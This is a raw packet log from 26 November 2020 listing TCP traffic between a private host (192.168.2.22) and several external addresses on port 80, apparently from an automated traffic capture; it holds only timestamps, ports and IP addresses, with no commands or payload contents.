Nov 26, 2020 21:16:01.579245090 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579245090 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579257965 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579268932 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579279900 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579293013 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579303980 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579307079 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579315901 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579327106 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579345942 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579356909 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579355955 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579375029 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579387903 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579400063 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579411030 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579418898 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579422951 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579435110 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579447031 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579458952 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579468966 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579469919 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579480886 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579492092 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579504013 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579515934 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579520941 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579528093 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579540014 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579551935 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579564095 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579565048 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579576969 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579587936 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579600096 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579611063 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579611063 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579622030 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579632998 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579644918 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579657078 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579663038 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579668045 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579674006 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579684019 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579700947 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579701900 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579714060 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579725981 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579741001 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579751015 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579751968 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579763889 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579782009 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579796076 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579797983 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579809904 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579821110 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579833031 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579843044 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579843998 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579855919 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579868078 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579879045 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579888105 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579891920 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579909086 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579926014 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579927921 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579936981 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579948902 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579960108 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579968929 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579971075 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579982996 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.580018044 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.580056906 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.594279051 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.595303059 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.694900990 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.694928885 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.694942951 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.694957972 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.694972038 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.694987059 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695000887 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695018053 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695019007 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.695035934 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695053101 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.695054054 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695058107 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.695069075 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695084095 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695097923 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.695099115 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695108891 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.695113897 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695131063 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695142031 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695144892 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.695152998 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695159912 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.695164919 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695179939 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695188046 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.695197105 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.695221901 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.695233107 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.697742939 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697761059 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697774887 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697792053 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697808027 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697809935 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.697824001 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697837114 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.697838068 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697850943 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697865963 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.697870016 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697885990 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697901964 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697901964 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.697916985 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697916985 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.697932959 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697947025 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697957039 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.697958946 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697966099 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.697976112 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697987080 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.697988033 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698002100 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698013067 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698039055 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698041916 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698056936 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698071957 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698075056 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698088884 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698096037 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698106050 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698122025 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698124886 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698137045 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698146105 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698153973 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698173046 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698180914 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698190928 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698193073 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698206902 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698215008 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698223114 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698237896 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698237896 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698252916 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698265076 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698268890 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698276997 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698290110 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698301077 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698306084 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698318958 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698323965 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698334932 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698347092 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698354959 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698364973 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698373079 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698389053 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698400021 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698405027 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698415041 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698421001 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698431015 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698436975 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698452950 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698456049 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698470116 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698488951 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698499918 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698506117 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698519945 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698522091 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698538065 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698543072 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698554039 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698565006 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698569059 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698585033 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698585987 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698600054 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698616982 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698618889 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698627949 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698636055 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698651075 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698652029 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698668957 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698684931 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698684931 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698699951 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698699951 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698715925 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698717117 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698731899 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698743105 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698750973 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698767900 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698772907 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698782921 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698784113 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698801994 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698817015 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698826075 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698827982 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698839903 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698839903 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698857069 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698862076 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698873043 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698887110 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698889971 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698905945 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698911905 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698923111 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698937893 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698939085 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698951960 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698956013 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698972940 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.698978901 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.698988914 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699003935 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699004889 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699023008 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699029922 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699049950 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699053049 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699067116 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699076891 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699083090 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699100018 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699105978 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699112892 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699115038 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699121952 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699134111 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699146032 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699150085 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699166059 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699167013 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699187040 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699202061 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699203968 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699222088 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699228048 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699230909 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699245930 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699264050 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699265003 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699275970 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699278116 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699294090 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699295998 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699309111 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699326992 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699342966 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699358940 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699369907 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699373007 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699381113 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699387074 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699388981 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699390888 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699404001 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699414015 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699419975 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699435949 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699435949 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699455976 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699466944 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699471951 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699484110 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699489117 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699506044 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699506044 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699521065 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699533939 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699537039 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699551105 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699552059 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699567080 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699584007 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699584961 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699599981 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699599981 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699615002 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699626923 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699630022 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699645042 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699645996 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699661016 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699676991 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699677944 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699691057 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699695110 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699707031 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.699717999 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699743032 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.699759007 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.714333057 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:02.194595098 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:48.308232069 CET	49166	80	192.168.2.22	209.126.13.151
Nov 26, 2020 21:16:48.439726114 CET	80	49166	209.126.13.151	192.168.2.22
Nov 26, 2020 21:16:48.439857960 CET	49166	80	192.168.2.22	209.126.13.151
Nov 26, 2020 21:16:48.440181971 CET	49166	80	192.168.2.22	209.126.13.151
Nov 26, 2020 21:16:48.571542025 CET	80	49166	209.126.13.151	192.168.2.22
Nov 26, 2020 21:16:48.929755926 CET	80	49166	209.126.13.151	192.168.2.22
Nov 26, 2020 21:16:48.929809093 CET	80	49166	209.126.13.151	192.168.2.22
Nov 26, 2020 21:16:48.930269957 CET	49166	80	192.168.2.22	209.126.13.151
Nov 26, 2020 21:16:48.930363894 CET	49166	80	192.168.2.22	209.126.13.151
Nov 26, 2020 21:16:49.061640024 CET	80	49166	209.126.13.151	192.168.2.22
Nov 26, 2020 21:16:54.282609940 CET	49167	80	192.168.2.22	156.235.143.6
Nov 26, 2020 21:16:54.607898951 CET	80	49167	156.235.143.6	192.168.2.22
Nov 26, 2020 21:16:54.608179092 CET	49167	80	192.168.2.22	156.235.143.6
Nov 26, 2020 21:16:54.608463049 CET	49167	80	192.168.2.22	156.235.143.6
Nov 26, 2020 21:16:54.934158087 CET	80	49167	156.235.143.6	192.168.2.22
Nov 26, 2020 21:16:55.174544096 CET	80	49167	156.235.143.6	192.168.2.22
Nov 26, 2020 21:16:55.174890995 CET	49167	80	192.168.2.22	156.235.143.6
Nov 26, 2020 21:16:55.214169025 CET	80	49167	156.235.143.6	192.168.2.22
Nov 26, 2020 21:16:55.214432001 CET	49167	80	192.168.2.22	156.235.143.6
Nov 26, 2020 21:16:55.500861883 CET	80	49167	156.235.143.6	192.168.2.22
Nov 26, 2020 21:17:00.236804008 CET	49168	80	192.168.2.22	184.168.131.241
Nov 26, 2020 21:17:00.400676012 CET	80	49168	184.168.131.241	192.168.2.22
